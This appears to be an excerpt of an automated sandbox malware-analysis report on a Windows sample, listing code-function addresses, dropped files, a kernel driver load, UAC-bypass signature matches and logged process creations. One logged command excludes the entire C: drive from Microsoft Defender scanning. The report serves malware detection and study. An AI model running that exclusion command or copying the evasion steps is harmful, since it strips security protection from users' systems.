                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code functions: 15_2_007D2738, 15_2_007D5D7C, 15_2_0091B0B1, 15_2_009410B2, 15_2_007E104C, 15_2_008400D8, 15_2_008D10D0, 15_2_00823020, 15_2_008F9020, 15_2_0094002D, 15_2_007D20C0, 15_2_0091D040, 15_2_0081C06C, 15_2_00817074, 15_2_0094A196, 15_2_0092919B, 15_2_00842198, 15_2_007ED148, 15_2_0093C1D4, 15_2_0090B1F2, 15_2_008211F0, 15_2_0092C117, 15_2_0090611E, 15_2_008CC118, 15_2_00812118, 15_2_008E1113, 15_2_0092613B, 15_2_007EC1D0, 15_2_007D11CC, 15_2_0091C125, 15_2_00826170, 15_2_0090B294, 15_2_0081D294, 15_2_008292B8, 15_2_008CA2CC, 15_2_008CC2DB, 15_2_008422DC, 15_2_008442D8, 15_2_0090F2F0, 15_2_0082E224, 15_2_0080923C, 15_2_0092A252, 15_2_008C538A, 15_2_00815398, 15_2_0082E39C, 15_2_009243B5, 15_2_0090E3D5, 15_2_008AF314, 15_2_008DA32A, 15_2_0084A358, 15_2_0092F377, 15_2_008D04AC, 15_2_008E34AD, 15_2_008484BC, 15_2_0092D4DD, 15_2_008DF4FA, 15_2_008B14F1, 15_2_0082E4F8, 15_2_007D1400, 15_2_007FB4FC, 15_2_0081F458
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007E94A415_2_007E94A4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0094544E15_2_0094544E
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0094747D15_2_0094747D
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008E047E15_2_008E047E
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008F55AE15_2_008F55AE
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008F65AD15_2_008F65AD
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008435B015_2_008435B0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008E55BB15_2_008E55BB
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0093C5C715_2_0093C5C7
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008145E015_2_008145E0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008E65FB15_2_008E65FB
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_009455E215_2_009455E2
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007F35F415_2_007F35F4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0090752C15_2_0090752C
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008AC54815_2_008AC548
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0094E54415_2_0094E544
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0081857015_2_00818570
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008426A015_2_008426A0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0084C6A015_2_0084C6A0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008346B415_2_008346B4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008B96B115_2_008B96B1
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0093E6CB15_2_0093E6CB
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008BF6ED15_2_008BF6ED
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_009086E415_2_009086E4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008F16FA15_2_008F16FA
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0090660615_2_00906606
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008BB62815_2_008BB628
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008B966A15_2_008B966A
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0094A67615_2_0094A676
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0082178C15_2_0082178C
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008227B415_2_008227B4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008AE71315_2_008AE713
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0080876C15_2_0080876C
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007FF87015_2_007FF870
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008CB8DE15_2_008CB8DE
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008EC8DB15_2_008EC8DB
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0083D80C15_2_0083D80C
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007D18EC15_2_007D18EC
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0084282015_2_00842820
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0083783415_2_00837834
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007F68C415_2_007F68C4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0083284C15_2_0083284C
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0084987015_2_00849870
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0084687815_2_00846878
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0084398415_2_00843984
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_009189CB15_2_009189CB
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007F791815_2_007F7918
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008DD90D15_2_008DD90D
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008B191815_2_008B1918
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0081194015_2_00811940
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007DBA6015_2_007DBA60
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00813AB015_2_00813AB0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00919AAB15_2_00919AAB
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00806ABC15_2_00806ABC
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008B2AEB15_2_008B2AEB
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00840AF415_2_00840AF4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00811AF815_2_00811AF8
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008C1A1115_2_008C1A11
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008C9A4415_2_008C9A44
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007E5AB015_2_007E5AB0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00837A5015_2_00837A50
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00845A5815_2_00845A58
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00808A6415_2_00808A64
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0091BA7615_2_0091BA76
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00841A7415_2_00841A74
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008C2B9115_2_008C2B91
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0090FBB315_2_0090FBB3
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008E5BB715_2_008E5BB7
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008AFBB015_2_008AFBB0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008C3BF115_2_008C3BF1
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007D9BF415_2_007D9BF4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008D9B2E15_2_008D9B2E
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0084DB3015_2_0084DB30
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008DFB5C15_2_008DFB5C
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0083DCAC15_2_0083DCAC
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00848CBC15_2_00848CBC
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00837CB815_2_00837CB8
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00935CDB15_2_00935CDB
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00822CC815_2_00822CC8
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00821CF015_2_00821CF0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0082AC0815_2_0082AC08
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00934C3C15_2_00934C3C
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00904C5815_2_00904C58
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00838C7815_2_00838C78
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00847D8015_2_00847D80
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00805D8415_2_00805D84
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00924D8E15_2_00924D8E
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0094DDBB15_2_0094DDBB
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008E7D0115_2_008E7D01
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00947D0B15_2_00947D0B
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008ECD5D15_2_008ECD5D
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007DED8815_2_007DED88
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008BDD7E15_2_008BDD7E
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00802EAC15_2_00802EAC
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008F6EC415_2_008F6EC4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00907EC715_2_00907EC7
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00901ECB15_2_00901ECB
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008DBED015_2_008DBED0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00832EDC15_2_00832EDC
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0083CEF415_2_0083CEF4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0090DE1F15_2_0090DE1F
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007D8EE415_2_007D8EE4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008D0E6615_2_008D0E66
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007D4E8015_2_007D4E80
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_0084CF9C15_2_0084CF9C
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007E6F5815_2_007E6F58
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007F1F5015_2_007F1F50
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008F7FDD15_2_008F7FDD
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00849FF415_2_00849FF4
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007EEF0815_2_007EEF08
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008C0F3C15_2_008C0F3C
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008DCF6515_2_008DCF65
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_0000000140001164
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_00000001400388E8
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_0000000140019D48
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_000000014005EFEC
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_000000014001D020
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_000000014003809C
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_0000000140060164
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_000000014002F1C0
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_000000014003A20C
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_000000014000C20C
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_000000014002D218
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_0000000140049424
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_000000014003842A
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_000000014004844C
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_00000001400614CC
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_000000014002C4E0
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_00000001400054E4
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_00000001400625B4
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_0000000140029608
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_000000014001565C
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_00000001400077A8
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_00000001400638E4
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_0000000140013902
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_0000000140012924
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_000000014004794C
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_0000000140054980
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_000000014002F998
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_0000000140054AF8
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_0000000140021C58
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_0000000140054C54
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_000000014002EEC8
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_0000000140047EE8
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_0000000140048F10
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_000000014006FFE0
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: 18_2_0000000140061FDC
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 19_2_00007FF88B060EF2
                    Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe 4F0B2C61BCCFD9AA3DB301EE4E15607DF41DED533757DE34C986A0FF25B6246D
                    Source: Joe Sandbox View | Dropped File: C:\Windows\Temp\K47ZW3T_7928.sys C37BF1ABC0662B4F18607E2D7B75F5C600E45EA5604DAFFA54674E2AEBDCE9F0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Process token adjusted: Load Driver
                    Source: C:\Windows\System32\svchost.exe | Code function: String function: 000002684C4984A8 appears 48 times
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: String function: 007EB600 appears 69 times
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | Code function: String function: 0000000140011D54 appears 62 times
                    Source: UZPt0hR.exe, 00000000.00000000.1201052726.0000000000680000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameunregmp2.exej% vs UZPt0hR.exe
                    Source: UZPt0hR.exe | Binary or memory string: OriginalFilenameunregmp2.exej% vs UZPt0hR.exe
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Driver loaded: \Registry\Machine\System\CurrentControlSet\Services\XuH4Y8_7928
                    Source: UZPt0hR.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 5.2.svchost.exe.2684c470000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.UZPt0hR.exe.95bfd8.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.UZPt0hR.exe.95bfd8.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.UZPt0hR.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: UZPt0hR.exe | Static PE information: Section: c2 ZLIB complexity 0.9931057837701613
                    Source: K47ZW3T_7928.sys.15.dr | Binary string: \Device\Udp6\Device\Udp\Device\Tcp6\Device\Tcp
                    Source: classification engine | Classification label: mal100.troj.expl.evad.winEXE@22/19@2/6
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_007D5D7C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,RegOpenKeyA,wsprintfA,RegCreateKeyA,RegSetValueExA,RegSetValueExA,RegSetValueExA,wsprintfA,RegSetValueExA,MultiByteToWideChar,wsprintfW,NtLoadDriver,RegCloseKey,RegCloseKey
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_004043D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_0041DE90 CoInitialize,CoCreateInstance,CoUninitialize
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Mutant created: \Sessions\1\BaseNamedObjects\{3FA0BA37-09C6-4551-AE7D-90F1279DF03F}
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Mutant created: \Sessions\1\BaseNamedObjects\{332F5D59-2BCB-4D58-B258-019647CFE541}
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_03
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Mutant created: \Sessions\1\BaseNamedObjects\{3309A6B4-2F09-4BC8-A971-5D5A3B1B34EE}
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Mutant created: \Sessions\1\BaseNamedObjects\{BECD724E-BB45-47CB-82D8-31731BA1EB16}
                    Source: C:\Windows\System32\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\{213CD3BF-7EA5-4F3F-A371-F1D075B5EB25}
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6884:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
                    Source: C:\Windows\System32\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}
                    Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """
                    Source: C:\Windows\System32\svchost.exe | File read: C:\Users\desktop.ini
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: UZPt0hR.exe | Virustotal: Detection: 57%
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | File read: C:\Users\user\Desktop\UZPt0hR.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\UZPt0hR.exe "C:\Users\user\Desktop\UZPt0hR.exe"
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
